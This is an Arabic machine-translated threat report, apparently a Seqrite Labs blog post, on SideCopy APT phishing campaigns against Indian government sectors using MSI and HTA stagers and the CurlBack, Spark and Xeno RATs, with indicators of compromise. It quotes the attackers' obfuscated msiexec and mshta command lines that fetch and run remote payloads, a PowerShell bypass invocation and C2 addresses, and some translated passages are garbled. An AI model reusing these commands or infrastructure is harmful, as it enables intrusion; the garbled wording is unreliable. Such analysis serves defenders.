• المنتجات والخدمات
        • سحابة

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • على بريم

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • المنظومة

          • Malware Analysis Platform
        • أعمال صغيرة

          • SOHO Total Edition
        • الخدمات

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • الأمن السيبراني و Data Privacy الاجتماعي
  • الحلول
    • بفسي
    • قطاع التعليم
    • حكومة
    • قطاع الرعاية الصحية
    • تكنولوجيا المعلومات
    • تصنيع
  • الشركة
    • من نحن Seqrite
    • القيادة
    • الجوائز والشهادات
    • الأخبار
  • الشركاء
    • برنامج شريك
    • تحديد الشريك
    • إشترك معنا
  • الدعم
  • المصادر
    • مدونات
    • هيتيبابرز
    • البيانات
    • دراسات الحالة
    • تقارير التهديد
    • كتيبات
    • وجهة نظر
    • فهم Data Privacy
    • تحقق من درجة المخاطر الخاصة بك
    • حوارات DPDP
    • ساعة الخصوصية
Seqrite مختبرات المدونة
اتصل بنا المبيعات هل تتعرض للهجوم؟
  • المنتجات والخدمات
        • سحابة

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • على بريم

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • المنظومة

          • Malware Analysis Platform
        • أعمال صغيرة

          • SOHO Total Edition
        • الخدمات

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • الأمن السيبراني و Data Privacy الاجتماعي
  • الحلول
    • بفسي
    • قطاع التعليم
    • حكومة
    • قطاع الرعاية الصحية
    • تكنولوجيا المعلومات
    • تصنيع
  • الشركة
    • من نحن Seqrite
    • القيادة
    • الجوائز والشهادات
    • الأخبار
  • الشركاء
    • برنامج شريك
    • تحديد الشريك
    • إشترك معنا
  • الدعم
  • المصادر
    • مدونات
    • هيتيبابرز
    • البيانات
    • دراسات الحالة
    • تقارير التهديد
    • كتيبات
    • وجهة نظر
    • فهم Data Privacy
    • تحقق من درجة المخاطر الخاصة بك
    • حوارات DPDP
    • ساعة الخصوصية
الصفحة الرئيسية  /  التصيد  وداعًا لـ HTA، مرحبًا بـ MSI: تقنيات وتكتيكات ومجموعات جديدة من هجمات APT مدفوعة بهجمات متعددة المنصات
وداعًا لـ HTA، مرحبًا بـ MSI: تقنيات وأساليب ومجموعات جديدة من هجمات APT مدفوعة بهجمات متعددة المنصات
08 ابريل 2025

وداعًا لـ HTA، مرحبًا بـ MSI: تقنيات وأساليب ومجموعات جديدة من هجمات APT مدفوعة بهجمات متعددة المنصات

كتب بواسطة ساثويك رام براكي
ساثويك رام براكي
التصيد

Seqrite كشف فريق مختبرات APT عن أساليب جديدة لمجموعة SideCopy APT المرتبطة بباكستان، والتي تم نشرها منذ الأسبوع الأخير من ديسمبر 2024. وقد وسّعت المجموعة نطاق استهدافها ليشمل، بالإضافة إلى الحكومة الهندية والدفاع والقطاعات البحرية وطلاب الجامعات، كيانات تابعة لوزارات السكك الحديدية والنفط والغاز والشؤون الخارجية. ومن أبرز التحولات في الحملات الأخيرة الانتقال من استخدام ملفات تطبيقات HTML (HTA) إلى اعتماد حزم Microsoft Installer (MSI) كآلية أساسية للاختراق.

يُطوّر المهاجمون باستمرار أساليبهم لتجنب الكشف، ويُعزى هذا التحوّل إلى استخدامهم المتواصل لتقنية تحميل مكتبات الارتباط الديناميكي (DLL) الجانبية وعمليات الاختراق متعددة المنصات. ويشمل هذا التطور أيضًا تقنيات مثل التحميل الانعكاسي وإعادة استخدام أدوات مفتوحة المصدر مثل Xeno RAT وSpark RAT، على غرار Async RAT لتوسيع قدراتها. بالإضافة إلى ذلك، تم تحديد حمولة خبيثة جديدة تُدعى CurlBack RAT، تقوم بتسجيل الضحية لدى خادم التحكم والسيطرة (C2).

النتائج الرئيسية

  • إن أسماء المستخدمين المرتبطة بمعرفات البريد الإلكتروني للمهاجمين تنتحل شخصية أحد أفراد طاقم الحكومة ذوي الخلفية في مجال الأمن السيبراني، وذلك باستخدام معرفات مخترقة.
  • يتم استخدام نطاق مزيف يحاكي خدمة الحكومة الإلكترونية، مع دليل مفتوح، لاستضافة الحمولات وصفحات تسجيل الدخول الاحتيالية.
  • تستضيف ثلاثة عشر نطاقًا فرعيًا وعناوين URL صفحات تسجيل الدخول لمختلف خدمات RTS للعديد من شركات المدن والبلديات (CMCs)، وكلها في ولاية ماهاراشترا.
  • تم اختراق النطاق الرسمي للمشروع الوطني للهيدرولوجيا (NHP)، التابع لوزارة الموارد المائية، لتوصيل حمولات ضارة.
  • تكتيكات جديدة مثل التحميل العاكس وفك تشفير AES لقسم الموارد عبر PowerShell لنشر نسخة مخصصة من أداة XenoRAT مفتوحة المصدر المستندة إلى C#.
  • تم نشر نسخة معدلة من أداة SparkRAT مفتوحة المصدر المستندة إلى Golang، والتي تستهدف منصات Linux، عبر نفس محنك تم استخدامه سابقًا لحمولات Poseidon و Ares RAT.
  • يُستخدم برنامج RAT جديد يُسمى CurlBack، ويستخدم تقنية التحميل الجانبي لملفات DLL. يُسجل الضحية لدى خادم C2 عبر UUID، ويدعم نقل الملفات باستخدام curl.
  • تمت ملاحظة الحملات ذات الطابع الاحتيالي في يناير/كانون الثاني 2025 ويونيو/حزيران 2024، تزامناً مع اعتقال موظف حكومي متهم بتسريب بيانات حساسة إلى مسؤول باكستاني.
  • بوابة تعليمية مُخترقة سابقًا، شوهدت في أغسطس 2024، عادت للعمل في فبراير 2025 بعناوين URL جديدة تستهدف طلاب الجامعات. وتتناول هذه العناوين ثلاثة مواضيع مختلفة: "تغير المناخ"، و"البحث"، و"المهنية". (يمكن الاطلاع على التحليل الكامل في التسجيل). اضغط هنا، موضحًا ستة مجموعات مختلفة من SideCopy APT).
  • استهدفت المجموعة الأم لـ SideCopy، APT36، أفغانستان بعد حملة طويلة ذات صلة بمكتب إدارة السجناء (OPA) التابع لإمارة أفغانستان الإسلامية. وشملت حملة حديثة استهدفت أنظمة Linux تحت عنوان "تطوير القيادة لحروب المستقبل" استخدام منصات مشفرة AES/RC4 لتعطيل أداة MeshAgent RMM.

القطاعات المستهدفة التابعة للوزارة الهندية

  • السكك الحديدية
  • النفط والغاز
  • الشؤون الخارجية
  • الدفاع

رسائل التصيّد الاحتيالي

بدأت الحملة التي تستهدف قطاع الدفاع برسالة بريد إلكتروني احتيالية بتاريخ 13 يناير/كانون الثاني 2025، بعنوان "تحديث جدول NDC 65 كما هو مذكور". تحتوي الرسالة على رابط لتنزيل ملف باسم "NDC65-Updated-Schedule.pdf" لجذب المستخدم المستهدف.

الشكل 1 - رسائل البريد الإلكتروني الاحتيالية NDC (1)

أُرسلت رسالة تصيد احتيالي ثانية في 15 يناير 2025 بعنوان "تحديث سياسة ملف course.txt"، وتحتوي أيضًا على رابط تصيد احتيالي. مصدر هذه الرسالة هو عنوان بريد إلكتروني يبدو رسميًا، ومن المرجح أنه مُخترق. كلية الدفاع الوطني (NDC) هي معهد تدريبي للخدمات الدفاعية في مجال الأمن الوطني الاستراتيجي والممارسات، يقع في دلهي، ويعمل تحت إشراف وزارة الدفاع الهندية.

الشكل 2 - رسائل البريد الإلكتروني الاحتيالية NDC (2)

أُنشئ عنوان البريد الإلكتروني للمهاجم "gsosystems-ndc@outlook[.]com" في 10 يناير 2025 في الإمارات العربية المتحدة، وظهر آخر مرة نشطًا في 28 فبراير 2025. وكشفت OSINT عن عنوان بريد إلكتروني مشابه "gsosystems.ndc-mod@nic[.]in" تابع للمركز الوطني للمعلومات (NIC)، التابع لوزارة الإلكترونيات وتكنولوجيا المعلومات (MeitY) في الهند. ينتحل اسم المستخدم المرتبط ببريد المهاجم الإلكتروني صفة موظف حكومي ذي خبرة في الأمن السيبراني.

الشكل 3 - البريد الإلكتروني للمهاجم

وثائق وهمية

يرتبط هذا الدليل بكلية الدفاع الوطني (NDC) في الهند، ويتضمن جدول التدريب السنوي (الدراسة والأنشطة) لعام ٢٠٢٥ للدورة الخامسة والستين (NDC-2025). يقع المعهد في نيودلهي، وهو معهد تدريبي في خدمة الدفاع، وأعلى مركز للتدريب الاستراتيجي لضباط خدمة الدفاع (القوات المسلحة الهندية) والخدمة المدنية، وجميعها تعمل تحت إشراف وزارة الدفاع الهندية.

الشكل 4 - تقويم NDC الوهمي [الدفاع]
تم رصد ملف أرشيف تصيد احتيالي آخر باسم "2024-National-Holidays-RH-PER_N-1.zip"، ويأتي بنسختين مختلفتين تستهدفان أنظمة ويندوز أو لينكس. بمجرد تشغيل الملف، يؤدي إلى مستند وهمي يحتوي على قائمة بالعطلات لموظفي الخط المفتوح لعام 2024، كما يوحي الاسم. هذا إشعار رسمي من شركة السكك الحديدية الجنوبية (Southern Railway) بتاريخ 19 ديسمبر 2023، خاص بقسم تشيناي. شركة السكك الحديدية الجنوبية (SR) هي إحدى المناطق الثماني عشرة التابعة للسكك الحديدية الهندية، وهي شركة مملوكة للدولة تابعة لوزارة السكك الحديدية الهندية.

الشكل 5 - قائمة العطلات الوهمية [السكك الحديدية]
تتضمن سلسلة العدوى الثالثة وثيقة بعنوان "إرشادات الأمن السيبراني" لعام ٢٠٢٤، ويبدو أنها صادرة عن شركة هندوستان بتروليوم المحدودة (HPCL). يقع مقر الشركة الرئيسي في مومباي، وهي شركة تابعة للقطاع العام في قطاع البترول والغاز الطبيعي، وهي شركة تابعة لمؤسسة النفط والغاز الطبيعي (ONGC)، وهي شركة مملوكة للدولة تابعة لوزارة البترول والغاز الطبيعي في الهند.

الشكل 6 - إرشادات الأمن السيبراني [النفط والغاز]
وثيقة أخرى مرتبطة بالعدوى نفسها هي "كتالوج المنتجات الصيدلانية" لعام ٢٠٢٥، الصادر عن وزارة الشؤون الخارجية الهندية (MAPRA). وهو مُوجّه خصيصًا لموظفي وزارة الشؤون الخارجية الهندية. شركة مابرا لابوراتوريز المحدودة هي شركة أدوية مقرها مومباي.

الشكل 7 - كتالوج الطعم [الشؤون الخارجية]

OpenDir وCredPhish

استُخدم نطاق وهمي ينتحل صفة خدمات بوابة الحكومة الإلكترونية لتنفيذ حملة تستهدف جهات السكك الحديدية. أُنشئ هذا النطاق في 16 يونيو/حزيران 2023، ويضم دليلاً مفتوحًا يستضيف ملفات متعددة، تم تحديدها أثناء التحقيق.

الشكل 8 - الدليل المفتوح

تم تحديد إجمالي 13 نطاقًا فرعيًا، تعمل كبوابات تسجيل دخول لأنظمة مختلفة مثل:

  • البريد الالكتروني
  • نظام إدارة خزان الأمان
  • نظام الرواتب
  • تعيين السلطة

من المرجح أن تُستخدم هذه المواقع في عمليات تصيد بيانات الاعتماد، منتحلة هوية العديد من البوابات الحكومية الرسمية منذ العام الماضي. عادةً ما ترتبط صفحات تسجيل الدخول هذه بخدمات RTS (قانون الحق في الخدمات العامة) وتخدم مختلف البلديات (CMC). جميع هذه البوابات المزيفة تابعة لمدن تقع ضمن ولاية ماهاراشترا.

  • Chandrapur
  • Gadchiroli
  • أكولا
  • ساتارا
  • فاساي فيرار
  • بالاربور
  • ميرا بهايندار
الشكل 9 - بوابات تسجيل الدخول المستضافة على نطاق وهمي

يوضح الجدول التالي المجالات الفرعية التي تم تحديدها وتواريخ ملاحظتها لأول مرة:

المجالات الفرعية الروية الأولى
gadchiroli.egovservice[.]in 2024-12-16
pen.egovservice[.]in 2024-11-27
cpcontacts.egovservice[.]in

cpanel.egovservice[.]in

webdisk.egovservice[.]in

cpcalendars.egovservice[.]in

webmail.egovservice[.]in

2024-01-03
dss.egovservice[.]in

cmc.egovservice[.]in

2023-11-03
mail.egovservice[.]in 2023-10-13
pakola.egovservice[.]in

pakora.egovservice[.]in

2023-07-23
خدمة الحكومة الإلكترونية[.]في 2023-06-16

جميع هذه النطاقات لها سجل DNS التالي، وهي مسجلة أساسًا تحت رقم AS 140641 (YOTTA NETWORK SERVICES PRIVATE LIMITED). يشير هذا إلى احتمال وجود بنية تحتية منسقة مُعدّة لانتحال هوية خدمات شرعية وجمع بيانات اعتماد من مستخدمين غير مُدركين.

الشكل 10 - تاريخ DNS

كشفت التحقيقات الإضافية في الدليل المفتوح عن عناوين URL إضافية مرتبطة بالنطاق المزيف. من المرجح أن هذه العناوين تُستخدم لأغراض تصيد احتيالي مماثلة، وتستضيف محتوىً وهميًا إضافيًا.

hxxps://egovservice.in/vvcmcrts/
hxxps://egovservice.in/vvcmc_safety_tank/
hxxps://egovservice.in/testformonline/test_form
hxxps://egovservice.in/payroll_vvcmc/
hxxps://egovservice.in/pakora/egovservice.in/
hxxps://egovservice.in/dssrts/
hxxps://egovservice.in/cmc/
hxxps://egovservice.in/vvcmcrtsballarpur72/
hxxps://egovservice.in/dss/
hxxps://egovservice.in/130521/set_authority/
hxxps://egovservice.in/130521/13/

المجموعة أ

تُظهر المجموعة الأولى من عمليات SideCopy نهجًا متطورًا باستهداف بيئات Windows وLinux في آنٍ واحد. وقد أُضيفت أحصنة طروادة جديدة للوصول عن بُعد (RATs) إلى ترسانتها، مما يُعزز قدرتها على اختراق أنظمة متنوعة بفعالية.

الشكل 11 - المجموعة أ

ويندوز

يقوم رابط بريد إلكتروني احتيالي بتحميل ملف أرشيف يحتوي على اختصار مزدوج الامتداد (.pdf.lnk). يتم استضافته على نطاقات تبدو شرعية:

hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/
hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/

يُشغّل الاختصار cmd.exe مع وسائط تستخدم أحرف الهروب (^) لتجنب الكشف وتقليل سهولة القراءة. ويظهر مُعرّف جهاز جديد "dv-kevin" مع هذه الملفات، حيث نرى عادةً البادئة "desktop-" بدلاً منه.

الشكل 12 - اختصارات ذات امتداد مزدوج

تُستخدم الأداة المساعدة msiexec.exe لتثبيت حزم MSI المُستضافة عن بُعد. تستخدم وضع السكون مع مفتاح التثبيت.

C:\Windows\System32\cmd.exe /cm^s^i^e^x^e^c.exe /q /ih^t^t^p^s^:^/^/^e^g^o^v^s^e^r^v^i^c^e^.^i^n^/^d^s^r^t^s^/^h^e^l^p^e^r^s^/^f^o^n^t^s^/^2^0^2^4^-^N^a^t^i^o^nal-^H^o^l^i^d^a^y^s^-^R^H^-^P^E^R^_^N-^1^/^i^n^s^t^/
C:\Windows\System32\cmd.exe /cm^s^i^e^x^e^c.exe /q /ih^t^t^p^s^:^/^/^n^h^p^.^m^o^w^r^.^g^o^v^.^i^n^/^N^H^P^M^I^S^/^T^r^a^i^n^i^n^g^M^a^t^e^r^i^a^l^/^a^s^p^x^/^S^e^c^u^r^i^t^y^-^G^u^i^d^e^l^i^n^e^s^/^w^o^n^t^/

يُحاكي النطاق الأول موقعًا وهميًا للحكومة الإلكترونية يظهر عند فتح الدليل، بينما النطاق الثاني مُخترق ويتبع للمشروع الوطني الرسمي للهيدرولوجيا، وهو جهة تابعة لوزارة الموارد المائية. يحتوي ملف MSI على ملف تنفيذي ConsoleApp1.exe مكتوب بلغة .NET ، يقوم بإسقاط عدة ملفات PE مُشفّرة بنظام base64. في البداية، يتم إسقاط الملف الوهمي في الدليل العام وفتحه، بينما يتم إسقاط باقي ملفات PE في المسار ' C:\ProgramData\LavaSoft\ '. من بينها ملفا DLL:

  • ملف DLL شرعي: Sampeose.dll
  • ملف DLL ضار: DUI70.dll، التعرف على CurlBack RAT.
الشكل 13 - القطارة داخل حزمة MSI

CurlBack RAT

يتم وضع ملف تنفيذي موقّع لنظام ويندوز باسم girbesre.exe، واسمه الأصلي CameraSettingsUIHost.exe ، بجانب ملفات DLL. عند تشغيله، يقوم الملف التنفيذي بتحميل ملف DLL خبيث بشكل جانبي. ويستمر هذا الخلل عن طريق وضع نص برمجي HTA ( svnides.hta ) يُنشئ مفتاح تسجيل Run للملف التنفيذي. تم العثور على عينتين مختلفتين من ملفات DLL الخبيثة، تحملان طابعَي وقت التجميع 24-12-2024 و30-12-2024.

الشكل 14 - التحقق من الاستجابة '/antivmcommand'

يتحقق CurlBack RAT مبدئيًا من استجابة عنوان URL محدد باستخدام الأمر '/antivmcommand'. إذا كانت الاستجابة "مفعلة"، فإنه يستمر، وإلا فإنه يُنهي نفسه مُحافظًا على عملية التحقق. يجمع معلومات النظام وأي أجهزة USB متصلة باستخدام مفتاح التسجيل:

  • "النظام\\ControlSet001\\Enum\\USBSTOR"
الشكل 15 - استرداد معلومات النظام وأجهزة USB

يعرض العمليات المتصلة والجارية للتحقق منها في Explorer وMSedge وChrome وNotepad وTaskMgr والخدمات وDefender والإعدادات.

الشكل 16 - تعداد العروض والعمليات

بعد ذلك، يقوم النظام بإنشاء مُعرّف فريد عالمي (UUID) لتسجيل العميل لدى خادم التحكم والسيطرة (C2). ويتم حفظ المُعرّف المُنشأ في المسار " C:\Users\<username>\.client_id.txt" مع اسم المستخدم.

الشكل 17 - معرف العميل الذي تم إنشاؤه لتسجيل C2

قبل التسجيل باستخدام المعرف، يتم إعداد الثبات عبر مهمة مجدولة باسم " OneDrive " للملف الثنائي الشرعي، والذي يمكن ملاحظته في الموقع: " C:\Windows\System32\Tasks\OneDrive ".

الشكل 18 - المهمة المجدولة

السلاسل المعكوسة المضافة إلى المجال C2 والغرض منها:

خيط الية عمل سفينة نوح
/ريتسيجر/ تسجيل العميل مع C2
/sdnammoc/ جلب الأوامر من C2
/taebtraeh/ تحقق من الاتصال مع C2 بانتظام
/stluser/ تحميل النتائج إلى C2

بمجرد التسجيل، يتم إبقاء الاتصال نشطًا لاسترداد أي أوامر تم إرجاعها في الاستجابة.

الشكل 19 - استجابة الأوامر بعد التسجيل

إذا كانت الاستجابة تحتوي على أي قيمة، فإنها تسترجع الطابع الزمني الحالي وتنفذ أحد أوامر C2 التالية:

أمر الية عمل سفينة نوح
info جمع معلومات النظام
بإمكانك تحميله تنزيل الملفات من المضيف
إصرار تعديل إعدادات الثبات
يجري تنفيذ أوامر عشوائية
استخراج استخراج البيانات من النظام
إذن التحقق من الامتيازات ورفعها
المستخدمين إحصاء حسابات المستخدمين
كمد تنفيذ عمليات سطر الأوامر
الشكل 20 - التحقق من امتياز العملية باستخدام أمر "الإذن"

تشمل الوظائف الأساسية الأخرى جلب تفاصيل المستخدم والمضيف، واستخراج ملفات الأرشيف، وإنشاء المهام. تُظهر السلاسل والأكواد البرمجية وجود CURL داخل ملف DLL الخبيث لحصر ونقل تنسيقات الملفات المختلفة:

  • ملفات الصور: GIF، JPEG، JPG، SVG
  • ملفات نصية: TXT، HTML، PDF، XML
الشكل 21 - بروتوكولات CURL المدعومة

لينكس

إضافةً إلى هجماتها التي تركز على نظام ويندوز، تستهدف المجموعة الأولى من برمجيات SideCopy الخبيثة بيئات لينكس أيضًا. يحمل ملف الأرشيف الخبيث نفس اسم نظيره في ويندوز، ولكن بتاريخ تعديل 20 ديسمبر 2024. يحتوي هذا الأرشيف على ملف تنفيذي ELF مكتوب بلغة Go، مما يعكس استراتيجية متسقة متعددة المنصات. عند التحليل، تبين أن تدفق وظائف برنامج الاختراق يتشابه مع برامج الاختراق المرتبطة ببرمجيات Poseidon وAres RAT الخبيثة. وترتبط هذه البرمجيات بمجموعتي Transparent Tribe وSideCopy من التهديدات المتقدمة المستمرة (APTs) على التوالي.

الشكل 22 - Golang Stager لنظام Linux

وظيفة Stager:

  1. استخدام مجلد مشترك أمر لتنزيل طُعم من خدمة الحكومة الإلكترونية المجال إلى الدليل المستهدف /.local/share وافتحه (National-Holidays-RH-PER_N-1.pdf).
  2. تنزيل الحمولة النهائية قزم as /.local/share/xdg-open وتنفيذها.
  3. قم بإنشاء crontab '/dev/shm/mycron' للحفاظ على الثبات أثناء إعادة تشغيل النظام للحمولة، تحت اسم المستخدم الحالي.

الحمولة النهائية التي ينقلها المُهيئ هي Spark RAT، وهو حصان طروادة مفتوح المصدر للوصول عن بُعد، يدعم أنظمة Windows وmacOS وLinux. كُتب بلغة Golang، ونُشر على GitHub عام ٢٠٢٢، ويحظى بشعبية كبيرة مع أكثر من ٥٠٠ فرع. يستخدم Spark RAT بروتوكول WebSocket وطلبات HTTP للتواصل مع خادم C2022.

الشكل 23 - اتصال "الرعد" المخصص لـ Spark RAT بـ C2

تشمل ميزات Spark RAT إدارة العمليات وإنهائها، ومراقبة حركة مرور الشبكة، واستكشاف الملفات ونقلها، وتحريرها وحذفها، وتظليل الأكواد البرمجية، ومراقبة سطح المكتب، والتقاط لقطات الشاشة، واسترجاع معلومات نظام التشغيل، والوصول إلى الأجهزة الطرفية عن بُعد. بالإضافة إلى ذلك، يدعم وظائف إدارة الطاقة مثل إيقاف التشغيل، وإعادة التشغيل، وتسجيل الخروج، والسكون، والإسبات، ووظائف قفل الشاشة.

المجموعة ب

تستهدف المجموعة الثانية من أنشطة SideCopy أنظمة Windows، على الرغم من أننا نشتبه في أنها تستهدف أنظمة Linux استنادًا إلى البنية التحتية التي تمت ملاحظتها منذ عام 2023.

الشكل 24 - المجموعة ب

تبدأ العدوى برابط بريد إلكتروني احتيالي، يُنزّل ملف أرشيف باسم "NDC65-Updated-Schedule.zip". يحتوي هذا الملف على ملف اختصار بامتداد مزدوج، يُفعّل ملف HTA عن بُعد مُستضاف على نطاق مُخترق آخر:

  • "hxxps://modspaceinterior.com/wp-content/upgrade/01/ & mshta.exe"
الشكل 25 - الأرشيف باستخدام LNK ضار

تم رصد مُعرِّف الجهاز المرتبط بـ LNK "desktop-ey8nc5b" في حملات SideCopy السابقة، على الرغم من أن تاريخ التعديل "2023:05:26" يشير إلى أنه قد يكون مُعرِّفًا أقدم قيد الاستخدام. بالتوازي مع مُنظِّمات MSI، تواصل المجموعة استخدام مُنظِّمات HTA التي لا تزال غير مُكتَشَفة تقريبًا (FUD).

الشكل 26 - مرحلة FUD تقريبًا لـ HTA

يحتوي ملف HTA على حمولة BroaderAspect.dll مشفرة بنظام Base64 ، وهي حمولة .NET يتم فك تشفيرها وتحميلها مباشرةً في ذاكرة MSHTA. يفتح هذا الملف الثنائي مستند NDC الوهمي الموجود في مجلد ProgramData ، بالإضافة إلى برنامج .NET إضافي بصيغة PDF في مجلد Public . يتم ضبط خاصية الثبات عبر مفتاح التسجيل Run المسمى "Edgre"، ويتم تنفيذه كالتالي:

  • cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf

الحمولة المشفرة

يحتوي الملف الثنائي .NET المسقط المسمى "Myapp.pdb" على ملفين للموارد:

  • "موارد تطبيقي. وثيقة. pdf"
  • "تطبيقي.خصائص.موارد.موارد"

تم فك تشفير الملف الأول باستخدام شيفرة قيصر مع إزاحة 9 أحرف في الاتجاه المعاكس. وتم تحميله باسم ' Public\Downloads\Document.pdf ' (بحجم 122.98 كيلوبايت)، وهو عبارة عن ورقة بحثية صادرة عن GIAC عام 2004 بعنوان "تقنيات الاتصال المتقدمة لبرامج التجسس التي تعمل عن بُعد على أنظمة تشغيل ويندوز".

الشكل 27 - وثيقة مع الحمولة المرفقة

على الرغم من أنها ليست فخًا، إلا أن حمولة مشفرة تُضاف في النهاية. يبحث البرنامج الخبيث عن علامة " %%EOF " لفصل بيانات PDF عن بيانات EXE. تُستخرج بيانات PDF من البداية حتى العلامة، بينما تُستخرج بيانات EXE بعد تخطي 6 بايتات بعد العلامة.

الشكل 28 - استخراج ملف EXE بعد علامة نهاية الملف

بعد بعض التأخير، يتم إسقاط بيانات EXE باسم " Public\Downloads\suport.exe " (49.53 كيلوبايت) والتي يتم إرسالها كوسيطة مع مفتاح لتشغيل أمر PowerShell.

الشكل 29 - استخراج الموارد وتشغيل PowerShell

مرحلة PowerShell

يظهر تنفيذ أمر PowerShell باستخدام الوسيطات الأساسية "-NoProfile -ExecutionPolicy Bypass -Command" لتجاهل السياسات والملفات الشخصية. يتم إرسال معلمتين:

  • -EPath 'C:\\Users\\Public\\Downloads\\suport.exe'
  • -EKey 'wq6AHvkMcSKA++1CPE3yVwg2CpdQhEzGbdarOwOrXe0='

بعد فترة من التأخير، يُفك تشفير مفتاح التشفير من Base64، وتُعامل أول 16 بايتًا كمدخلات لتشفير AES (وضع CBC مع حشو PKCS7). يتم ذلك لتحميل الملف الثنائي المُفكك كتجميع .NET مباشرةً في الذاكرة، مع استدعاء نقطة دخوله.

الشكل 30 - فك تشفير PowerShell

Xeno RAT مخصص

يؤدي حذف حمولة .NET النهائية المسماة "DevApp.exe" إلى وظائف مألوفة في Xeno RAT. وهو حصان طروادة مفتوح المصدر للوصول عن بُعد، ظهر لأول مرة في نهاية عام 2023. تشمل الميزات الرئيسية HVNC، والوصول المباشر إلى الميكروفون، ووكيل Sock5 العكسي، وتجاوز التحكم بحساب المستخدم (UAC)، ومسجل لوحة المفاتيح، وغيرها. أضاف الإصدار المخصص الذي يستخدمه SideCopy أساليب أساسية لمعالجة النصوص باستخدام C2 والمنفذ 79.141.161[.]58:1256.

الشكل 31 - Xeno RAT مخصص

في العام الماضي، استُخدمت نسخة مُخصصة من برنامج Xeno RAT تُسمى MoonPeak من قِبل مجموعة تهديدات متقدمة متقدمة مرتبطة بكوريا الشمالية، تُعرف باسم UAT-5394. وبالمثل، تبنت جهات ناطقة بالصينية، مثل DragonSpark وTAG-100، نسخًا مُخصصة من برنامج Spark RAT.

البنية التحتية والإسناد

النطاقات التي تستخدمها مجموعة التهديد لتجهيز البرامج الضارة. معظمها مسجل باسم GoDaddy.com, LLC.

مجال التدريج الروية الأولى تم إنشاؤها ASN
modspaceinterior[.]com يناير 2025 سبتمبر 2024 AS 46606 – جودادي
drjagrutichavan[.]com يناير 2025 أكتوبر 2021 AS 394695 – جودادي
nhp.mowr[.]gov[.]in ديسمبر 2024 فبراير 2005 AS 4758 – المركز الوطني للمعلوماتية
خدمة الحكومة الإلكترونية[.]في ديسمبر 2024 يونيو 2023 AS 140641 – جودادي
pmshriggssssiwan[.]in نوفمبر 2024 مارس 2024 AS 47583 – هوستينجر
بوابات التعليم[.]في أغسطس 2024 أغسطس 2024 AS 22612 – NameCheap

تم إنشاء نطاقات C2 قبل الحملة مباشرة في الأسبوع الأخير من ديسمبر 2024. وبالتعاون مع مسجل النطاقات الكندي "Internet Domain Service BS Corp."، يتم حلها إلى عناوين IP ذات Cloudflare ASN 13335 الموجودة في كاليفورنيا.

مجال C2 تم إنشاؤها IP ASN
التحديثات.widgetservicecenter[.]com X 104.21.15 [.] 163

172.67.163 [.] 31

 

ASN 13335 – كلاوفليير
التحديثات.biossysinternal[.]com X 172.67.167 [.] 230

104.21.13 [.] 17

ASN 202015 – HZ Hosting Ltd.

يحتوي C2 لـ Xeno RAT 79.141.161[.]58 على اسم شائع فريد (CN=PACKERP-63KUN8U) مع HZ Hosting Limited من ASN 202015. المنفذ المستخدم للاتصال هو 1256 ولكن تم أيضًا ملاحظة منفذ RDP مفتوح 56777.

الشكل 32 - نموذج الماس

يرتبط كلا نطاقي التحكم والسيطرة (C2) برقم نظام التشغيل المستقل (ASN) الخاص بشركة Cloudflare وهو 13335، والذي يُحلّل إلى نطاق عناوين IP 172.67.xx.xx. وقد استغلت شركة SideCopy نطاقات تحكم وسيطرة مماثلة على هذا الرقم سابقًا في هجمات استهدفت القطاع البحري . وبالنظر إلى مجموعات الإصابة السابقة، والأساليب والتقنيات والإجراءات المرصودة، والفهارس المفتوحة المستضافة، تُنسب هذه الحملات، التي تستخدم أساليب وتقنيات وإجراءات جديدة، إلى شركة SideCopy بدرجة عالية من الثقة.

خاتمة

طورت مجموعة التهديدات المتقدمة المستمرة SideCopy، المرتبطة بباكستان، تكتيكاتها بشكل ملحوظ منذ أواخر ديسمبر 2024، حيث وسّعت نطاق أهدافها ليشمل قطاعات حيوية مثل السكك الحديدية، والنفط والغاز، ووزارات الخارجية. انتقلت المجموعة من استخدام ملفات HTA إلى حزم MSI كآلية رئيسية للتشغيل، وتواصل استخدام تقنيات متقدمة مثل التحميل الجانبي لـ DLL، والتحميل الانعكاسي، وفك تشفير AES عبر PowerShell. بالإضافة إلى ذلك، تستفيد المجموعة من أدوات مفتوحة المصدر مخصصة مثل Xeno RAT وSpark RAT، بالإضافة إلى نشر CurlBack RAT المُكتشف حديثًا. تُستخدم النطاقات المُخترقة والمواقع المزيفة في عمليات التصيد الاحتيالي لبيانات الاعتماد واستضافة الحمولات، مما يُسلط الضوء على جهود المجموعة المستمرة لتعزيز الثبات وتجنب الكشف.

SEQRITE الحماية

  • LNK.SideCopy.49245.Gen
  • LNK.Trojan.49363.GC
  • SideCopy.Mal.49246.GC
  • HTA.SideCopy.49248.Gen
  • HTA.SideCopy.49247.Gen
  • HTA.Trojan.49362.GC
  • Trojan.Fmq

شركات النفط العالمية

ويندوز

a5410b76d0cb36786e00d2968d3ab6e4 2024-العطلات-الوطنية-RH-PER_N-1.zip
f404496abccfa93eed5dfda9d8a53dc6 2024-الأعياد-الوطنية-RH-PER_N-1.pdf.lnk
0e57890a3ba16b1ac0117a624f262e61 إرشادات الأمان.zip
57c2f8b4bbf4037439317a44c2263346 إرشادات الأمان.pdf.lnk
53eebedc3846b7cf5e29a90a5b96c803 wininstaller.msi
97c3328427b72f05f120e9a98b6f9b09 ملف installerr.msi
0690116134586d41a23baed300fc6355 ConsoleApp1.exe
ef40f484e095f0f6f207139cb870a16e ConsoleApp1.exe
9d189e06d3c4cefdd226e645a0b8bdb9 DUI70.dll
589a65e0f3fe6777d17d0ac36ab07f6f DUI70.dll
0eb9e8bec7cc70d603d2d8b6efdd6bb5 جدول التحديث لـ ndc 65 كما هو موضح في الملف txt
